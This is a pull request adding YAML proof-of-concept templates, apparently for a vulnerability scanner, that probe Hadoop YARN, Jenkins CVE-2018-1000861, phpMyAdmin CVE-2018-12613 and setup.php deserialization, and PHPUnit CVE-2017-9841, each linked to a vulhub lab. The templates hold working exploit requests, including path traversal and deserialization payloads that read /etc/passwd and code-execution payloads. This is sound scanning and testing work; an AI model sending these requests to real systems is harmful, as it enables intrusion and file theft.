### PR TITLE
update poc

### DIFF
--- a/pocs/poc-yaml-hadoop-yarn-auth.yaml
+++ b/pocs/poc-yaml-hadoop-yarn-auth.yaml
@@ -1,0 +1,11 @@
+name: poc-yaml-hadoop-yarn-auth
+rules:
+  - method: GET
+    path: /ws/v1/cluster/apps/new-application
+    follow_redirects: false
+    expression: >-
+      status==500 &&
+      body.bcontains(b'<javaClassName>javax.ws.rs.WebApplicationException')
+detail:
+  author: p0wd3r
+  vulhub: https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn

--- a/pocs/poc-yaml-hadoop-yarn-unauth.yaml
+++ b/pocs/poc-yaml-hadoop-yarn-unauth.yaml
@@ -1,4 +1,4 @@
-name: poc-yaml-hadoop-yarn-auth
+name: poc-yaml-hadoop-yarn-unauth
 rules:
   - method: GET
     path: /ws/v1/cluster/apps/new-application

--- a/pocs/poc-yaml-jenkins-cve-2018-1000861-rce.yaml
+++ b/pocs/poc-yaml-jenkins-cve-2018-1000861-rce.yaml
@@ -5,3 +5,6 @@ rules:
       /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;
     follow_redirects: false
     expression: 'status==200 && body.bcontains(b''package#vulntest'')'
+detail:
+  author: p0wd3r
+  vulhub: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861

--- a/pocs/poc-yaml-jenkins-cve-2018-1000861-rce.yaml
+++ b/pocs/poc-yaml-jenkins-cve-2018-1000861-rce.yaml
@@ -4,7 +4,8 @@ rules:
     path: >-
       /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;
     follow_redirects: false
-    expression: 'status==200 && body.bcontains(b''package#vulntest'')'
+    expression: >-
+      status==200 && body.bcontains(b'package#vulntest')
 detail:
   author: p0wd3r
   vulhub: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861

--- a/pocs/poc-yaml-jenkins-cve-2018-1000861-rce.yaml
+++ b/pocs/poc-yaml-jenkins-cve-2018-1000861-rce.yaml
@@ -1,0 +1,7 @@
+name: poc-yaml-jenkins-cve-2018-1000861-rce
+rules:
+  - method: GET
+    path: >-
+      /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;
+    follow_redirects: false
+    expression: 'status==200 && body.bcontains(b''package#vulntest'')'

--- a/pocs/poc-yaml-phpmyadmin-cve-2018-12613-file-inclusion.yaml
+++ b/pocs/poc-yaml-phpmyadmin-cve-2018-12613-file-inclusion.yaml
@@ -1,0 +1,6 @@
+name: poc-yaml-phpmyadmin-setup-deserialization
+rules:
+  - method: GET
+    path: /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
+    follow_redirects: false
+    expression: 'status==200 && body.bcontains(b''root:x:0:0'')'

--- a/pocs/poc-yaml-phpmyadmin-cve-2018-12613-file-inclusion.yaml
+++ b/pocs/poc-yaml-phpmyadmin-cve-2018-12613-file-inclusion.yaml
@@ -3,7 +3,8 @@ rules:
   - method: GET
     path: /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
     follow_redirects: false
-    expression: 'status==200 && body.bcontains(b''root:x:0:0'')'
+    expression: >-
+      status==200 && body.bcontains(b'root:x:0:0')
 detail:
   author: p0wd3r
   vulhub: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613

--- a/pocs/poc-yaml-phpmyadmin-cve-2018-12613-file-inclusion.yaml
+++ b/pocs/poc-yaml-phpmyadmin-cve-2018-12613-file-inclusion.yaml
@@ -4,3 +4,6 @@ rules:
     path: /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
     follow_redirects: false
     expression: 'status==200 && body.bcontains(b''root:x:0:0'')'
+detail:
+  author: p0wd3r
+  vulhub: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613

--- a/pocs/poc-yaml-phpmyadmin-cve-2018-12613-file-inclusion.yaml
+++ b/pocs/poc-yaml-phpmyadmin-cve-2018-12613-file-inclusion.yaml
@@ -1,4 +1,4 @@
-name: poc-yaml-phpmyadmin-setup-deserialization
+name: poc-yaml-phpmyadmin-cve-2018-12613-file-inclusion
 rules:
   - method: GET
     path: /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

--- a/pocs/poc-yaml-phpmyadmin-setup-deserialization.yaml
+++ b/pocs/poc-yaml-phpmyadmin-setup-deserialization.yaml
@@ -6,3 +6,6 @@ rules:
       action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
     follow_redirects: false
     expression: 'status==200 && body.bcontains(b''root:x:0:0'')'
+detail:
+  author: p0wd3r
+  vulhub: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433

--- a/pocs/poc-yaml-phpmyadmin-setup-deserialization.yaml
+++ b/pocs/poc-yaml-phpmyadmin-setup-deserialization.yaml
@@ -1,0 +1,8 @@
+name: poc-yaml-phpmyadmin-setup-deserialization
+rules:
+  - method: POST
+    path: /scripts/setup.php
+    body: >-
+      action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
+    follow_redirects: false
+    expression: 'status==200 && body.bcontains(b''root:x:0:0'')'

--- a/pocs/poc-yaml-phpmyadmin-setup-deserialization.yaml
+++ b/pocs/poc-yaml-phpmyadmin-setup-deserialization.yaml
@@ -5,7 +5,8 @@ rules:
     body: >-
       action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
     follow_redirects: false
-    expression: 'status==200 && body.bcontains(b''root:x:0:0'')'
+    expression: >-
+      status==200 && body.bcontains(b'root:x:0:0')
 detail:
   author: p0wd3r
   vulhub: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433

--- a/pocs/poc-yaml-phpunit-cve-2017-9841-rce.yaml
+++ b/pocs/poc-yaml-phpunit-cve-2017-9841-rce.yaml
@@ -1,0 +1,10 @@
+name: poc-yaml-phpunit-cve-2017-9841-rce
+rules:
+  - method: POST
+    path: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
+    body: <?php echo "vuln" . (29004 + 2333) ?>
+    follow_redirects: false
+    expression: status==200 && body.bcontains(b'vuln31337')
+detail:
+  author: p0wd3r
+  vulhub: https://github.com/vulhub/vulhub/tree/master/phpunit/CVE-2017-9841


### PR DESCRIPTION
# Phpmyadmin Scripts/setup.php Deserialization Vulnerability (WooYun-2016-199433)
## Summary
what POC is this PR for?

Phpmyadmin Scripts/setup.php Deserialization Vulnerability (WooYun-2016-199433)

## POC

```yaml
# yaml code

name: poc-yaml-phpmyadmin-setup-deserialization
rules:
  - method: POST
    path: /scripts/setup.php
    body: >-
      action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
    follow_redirects: false
    expression: >-
      status==200 && body.bcontains(b'root:x:0:0')
```

## Test Environment

The vuln can be reproduced in the following docker environment.

https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433

## Remarks

p师傅 vulhub 的搬运工

---

# phpmyadmin 4.8.1 Remote File Inclusion Vulnerability (CVE-2018-12613)

## Summary
what POC is this PR for?

phpmyadmin 4.8.1 Remote File Inclusion Vulnerability (CVE-2018-12613)

## POC

```yaml
# yaml code

name: poc-yaml-phpmyadmin-cve-2018-12613-file-inclusion
rules:
  - method: GET
    path: /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
    follow_redirects: false
    expression: >-
      status==200 && body.bcontains(b'root:x:0:0')
```

## Test Environment

The vuln can be reproduced in the following docker environment.

https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613

## Remarks

p师傅 vulhub 的搬运工

---

# Jenkins 远程命令执行漏洞（CVE-2018-1000861）

## Summary
what POC is this PR for?

Jenkins 远程命令执行漏洞（CVE-2018-1000861）

## POC

```yaml
# yaml code

name: poc-yaml-jenkins-cve-2018-1000861-rce
rules:
  - method: GET
    path: >-
      /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;
    follow_redirects: false
    expression: >-
      status==200 && body.bcontains(b'package#vulntest')
```

## Test Environment

The vuln can be reproduced in the following docker environment.

https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861

## Remarks

p师傅 vulhub 的搬运工

---

# phpunit 远程代码执行漏洞（CVE-2017-9841）

## Summary
what POC is this PR for?

phpunit 远程代码执行漏洞（CVE-2017-9841）

## POC

```yaml
# yaml code

name: poc-yaml-phpunit-cve-2017-9841-rce
rules:
  - method: POST
    path: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
    body: <?php echo "vuln" . (29004 + 2333) ?>
    follow_redirects: false
    expression: status==200 && body.bcontains(b'vuln31337')
```

## Test Environment

The vuln can be reproduced in the following docker environment.

https://github.com/vulhub/vulhub/tree/master/phpunit/CVE-2017-9841

## Remarks

p师傅 vulhub 的搬运工

---

# Hadoop YARN ResourceManager 未授权访问

## Summary
what POC is this PR for?

Hadoop YARN ResourceManager 未授权访问

## POC

```yaml
# yaml code

name: poc-yaml-hadoop-yarn-unauth
rules:
  - method: GET
    path: /ws/v1/cluster/apps/new-application
    follow_redirects: false
    expression: >-
      status==500 &&
      body.bcontains(b'<javaClassName>javax.ws.rs.WebApplicationException')
```

## Test Environment

The vuln can be reproduced in the following docker environment.

https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn

## Remarks

p师傅 vulhub 的搬运工